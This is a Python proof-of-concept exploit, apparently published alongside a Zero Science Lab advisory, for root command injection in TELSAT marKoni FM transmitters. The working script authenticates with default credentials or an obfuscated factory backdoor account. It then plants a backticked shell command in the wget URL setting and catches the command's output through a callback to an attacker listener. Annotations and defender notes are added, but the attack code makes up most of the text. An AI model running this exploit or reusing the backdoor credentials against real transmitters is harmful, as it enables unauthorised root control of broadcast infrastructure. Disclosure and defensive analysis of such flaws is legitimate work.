
TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection - PoC Exploit

Mar 21st, 2024
  1. #!/usr/bin/env python
  2. #
  3. #
  4. # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
  5. #
  6. #
  7. # Vendor: TELSAT Srl
  8. # Product web page: https://www.markoni.it
  9. # Affected version: Markoni-D (Compact) FM Transmitters
  10. #                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
  11. #                   Markoni-A (Analogue Modulator) FM Transmitters
  12. #                   Firmware: 1.9.5
  13. #                             1.9.3
  14. #                             1.5.9
  15. #                             1.4.6
  16. #                             1.3.9
  17. #
  18. # Summary: Professional FM transmitters.
  19. #
  20. # Desc: The marKoni FM transmitters are susceptible to unauthenticated
  21. # remote code execution with root privileges. An attacker can exploit
  22. # a command injection vulnerability by manipulating the Email settings'
  23. # WAN IP info service, which utilizes the 'wget' module. This allows
  24. # the attacker to gain unauthorized access to the system with administrative
  25. # privileges by exploiting the 'url' parameter in the HTTP GET request
  26. # to ekafcgi.fcgi.
  27. #
  28. # -------------------------------------------------------------------------
  29. # [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
  30. # Authentication successful for backdoor
  31. # Injecting command: whoami
  32. # Listening on port 9999
  33. # ('10.0.8.3', 47302) called back
  34. # Received: root
  35. # Housekeeping...
  36. # Zya and thanks for stopping by!
  37. #
  38. # [lqwrm@metalgear ~]#
  39. #
  40. # -------------------------------------------------------------------------
  41. #
  42. # Tested on: GNU/Linux 3.10.53 (armv7l)
  43. #            icorem6solox
  44. #            lighttpd/1.4.33
  45. #
  46. #
  47. # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  48. # Macedonian Information Security Research and Development Laboratory
  49. # Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  50. #
  51. #
  52. # Advisory ID: ZSL-2024-5808
  53. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
  54. #
  55. #
  56. # 10.11.2023
  57. #
  58.  
  59. from colorama import init, Fore
  60. import re,os,sys,requests
  61. import socket,threading
  62. from time import sleep
  63. init()
  64.  
def just_listen_to_me(lport, cstop):
    """Accept one inbound TCP connection on *lport* and print its User-Agent.

    Runs in a worker thread started by the module-level driver. The
    transmitter's callback is an HTTP request whose ``User-Agent`` header
    carries the injected command's output; the first ``User-Agent:`` value
    seen on the connection is printed as ``Received: ...``.

    Args:
        lport: TCP port to bind on every interface (``0.0.0.0``).
        cstop: ``threading.Event`` set once a connection is accepted.
            Nothing in this function reads it.

    From a monitoring standpoint the observable is the transmitter opening
    an outbound HTTP connection to an arbitrary host on a non-standard
    port; an FM transmitter has no business doing that unprompted.

    The control flow here is unusual -- see the NOTE(review) comments.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lport))
    s.listen(1)
    print("Listening on port " + str(lport))
    try:
        conn, addr = s.accept()
        print(addr, "called back")
        cstop.set()
    except socket.timeout:
        # NOTE(review): settimeout() is never called on ``s``, so accept()
        # blocks indefinitely and this branch cannot fire; if it did,
        # ``conn`` would be unbound on the next line.
        print("Call return timeout\nCheck your ports")
        conn.close()
    while True:
        try:
            # If the peer closes without sending a User-Agent, recv() keeps
            # returning b"" and this loop spins printing "No output for you".
            odg = conn.recv(1771).decode()
            uam = re.search(r"User-Agent:\s*(.*)", odg)

            if uam:
                uav = uam.group(1)
                print(f"Received: {uav}")
                # exit() raises SystemExit *inside* the try, so the bare
                # except below catches it and prints "Housekeeping..." before
                # exiting again -- this is the order shown in the header's
                # sample run.
                exit()
            else:
                print("No output for you")
        except:
            # Bare except: also swallows SystemExit/KeyboardInterrupt and any
            # recv()/decode() error; the second exit() ends the thread.
            print("Housekeeping...")
            exit()
    # Unreachable: the loop above only ends by raising.
    s.close()
  92.  
def authenticate(ipaddr, option):
    """Log in to the transmitter's CGI and return its session cookie.

    Issues ``GET /cgi-bin/ekafcgi.fcgi?OpCode=1`` with ``username`` and
    ``password`` as query-string parameters over plain HTTP, so the
    credentials end up in the URL (and in any proxy or server log).
    Success is judged solely by the presence of a ``Set-Cookie`` header.

    Args:
        ipaddr: target as ``host`` or ``host:port``.
        option: ``"user"``, ``"admin"`` or ``"backdoor"``. The first two
            use credentials equal to the account name; the third is an
            undocumented fixed account baked into the firmware. Any other
            value leaves ``username``/``password`` unbound and the dict
            literal below raises NameError.

    Returns:
        The ``name=value`` part of the ``Set-Cookie`` header, or ``None``
        when no cookie was returned.

    Defender notes: a fixed, undocumented account is a vendor-side fix
    (remove it, or make it operator-rotatable); on the network side, logins
    to ``OpCode=1`` with an account name that no operator created, and any
    credentials carried in a GET query string, are straightforward things
    to alert on.
    """
    auth_url = f"http://{ipaddr}"
    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
    if option == "user":
        # Hex-escaped ASCII; both decode to the option name.
        username = "\x75\x73\x65\x72"
        password = "\x75\x73\x65\x72"
    elif option == "admin":
        # Hex-escaped ASCII; both decode to the option name.
        username = "\x61\x64\x6D\x69\x6E"
        password = "\x61\x64\x6D\x69\x6E"
    elif option == "backdoor":
        # Undocumented fixed account; kept hex-escaped as in the original.
        username = "\x66\x61\x63\x74\x6F\x72\x79"
        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"

    authp = {
        'username': username,
        'password': password
    }

    # Credentials go out as query parameters; no TLS, no response status check.
    resp = requests.get(auth_url + ep + "1", params=authp)

    if "Set-Cookie" in resp.headers:
        print(f"Authentication successful for {option}")
        # Keep only "name=value"; drop Path/Expires attributes.
        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
        return auth_cookie
    else:
        print(f"Authentication failed for {option}.")
        print("Try a different option.")
        return None
  121.  
def execute(ipaddr, cookie, command, listen_ip):
    """Plant *command* in the WAN-IP ``wget`` setting and trigger it.

    Four authenticated GETs to ``/cgi-bin/ekafcgi.fcgi``, in order:

    1. ``OpCode=26&param=wget&ena=1&url=...`` -- stores the "url" value.
       Instead of a URL it holds a wget argument list in which *command*
       sits between backticks (``%60``), followed by ``listen_ip:9999``.
       The header describes this as command injection, so presumably the
       firmware hands the setting to a shell when it builds the wget
       command line; the command's output then becomes the ``-U``
       User-Agent of the callback request.
    2. ``OpCode=27`` -- applies the settings (inferred from the sequence;
       not documented on this page).
    3. ``OpCode=26&param=wget&ena=0&url=`` -- clears the injected value.
    4. ``OpCode=3&com1=203C%20001001`` -- purpose not visible here.

    Responses are never inspected. The function ends with ``exit(0)``, so
    control does not return to the caller.

    Args:
        ipaddr: target ``host[:port]``.
        cookie: session cookie from authenticate().
        command: inserted verbatim into the query string.
        listen_ip: address the target connects back to (port 9999 fixed).

    Defender notes: the ``url`` value of the WAN-IP/Email settings request
    should never contain shell metacharacters (backticks, ``$(``, ``;``,
    ``|``); a WAF or access-log rule on ``OpCode=26`` with such characters
    catches this pattern, and the device's outbound HTTP to an unexpected
    host is the second indicator. The root-cause fix is vendor-side: do not
    pass the setting through a shell (exec wget with an argv array) and
    validate the value as a URL before storing it.
    """
    print(f"Injecting command: {command}")
    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
    # Step 1: store the setting with the backticked command.
    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
    # Step 2: apply.
    dva = f"http://{ipaddr}{ep}27"
    # Step 3: disable/clear the setting again.
    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
    # Step 4: meaning of com1=203C 001001 is not shown on this page.
    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"

    headers = {"Cookie": cookie}

    # Fixed sleeps give the device time to act on each request; nothing
    # verifies that it did.
    requests.get(eden, headers=headers)
    sleep(2)
    requests.get(dva, headers=headers)
    sleep(2)
    requests.get(tri, headers=headers)
    sleep(1)
    requests.get(clear, headers=headers)
    print("Zya and thanks for stopping by!")
    # SystemExit in the main thread; the non-daemon listener thread keeps
    # the interpreter alive until it finishes.
    exit(0)
  141.  
def njaaah(text):
    """Print *text* centered across the current terminal width.

    Raises OSError (from os.get_terminal_size) when stdout is not a terminal.
    """
    print(text.center(os.get_terminal_size().columns))
  145.  
# ANSI bright-red "Waddup!" used inside the banner below.
zsl = "\033[91mWaddup!\033[0m"
# ASCII-art banner shown with the usage text. Backslashes are doubled
# because this is an f-string; {zsl} is interpolated once at import time.
mrjox = f"""
    ________
  /          \\
 /    ____    \\
|   /    0 \\   |
|   \\______/   |
 \\____________/  {zsl}
      | |
     /   \\
    /  O  \\
   |    O  \\
   |       \\
   |        \\
   |_________|
       """

# ---- CLI driver -------------------------------------------------------
# Exactly four positional arguments are required; otherwise print usage
# and the banner, then exit.
if len(sys.argv) != 5:
    print()
    print("This is a PoC script for the marKoni transmitters 0day")
    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
    print("Option: 'user', 'admin', 'backdoor'")
    print("Default listening port: 9999")
    njaaah(mrjox)
    exit()

ipaddr = sys.argv[1]      # transmitter web UI as host[:port]
opt = sys.argv[2]         # account to authenticate with
listen_ip = sys.argv[3]   # address the target should connect back to
command = sys.argv[4]     # command passed through to execute()

# Identity mapping; it only serves as the allow-list of valid options.
opt_map = {
    "admin"    : "admin",
    "user"     : "user",
    "backdoor" : "backdoor"
}

if opt in opt_map:
    auth_cookie = authenticate(ipaddr, opt_map[opt])
    if auth_cookie:
        cstop = threading.Event()
        # Listener thread on port 9999 -- the same fixed port hardcoded in
        # execute(); "Default listening port" above is not configurable.
        # The thread is non-daemon, so the process lives until it ends.
        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
        lt.start()
        # execute() terminates with exit(0), so cstop.set() and lt.join()
        # below are never reached; just_listen_to_me never reads cstop anyway.
        execute(ipaddr, auth_cookie, command, listen_ip)
        cstop.set()
        lt.join()
else:
    print("Invalid option.")
  194.            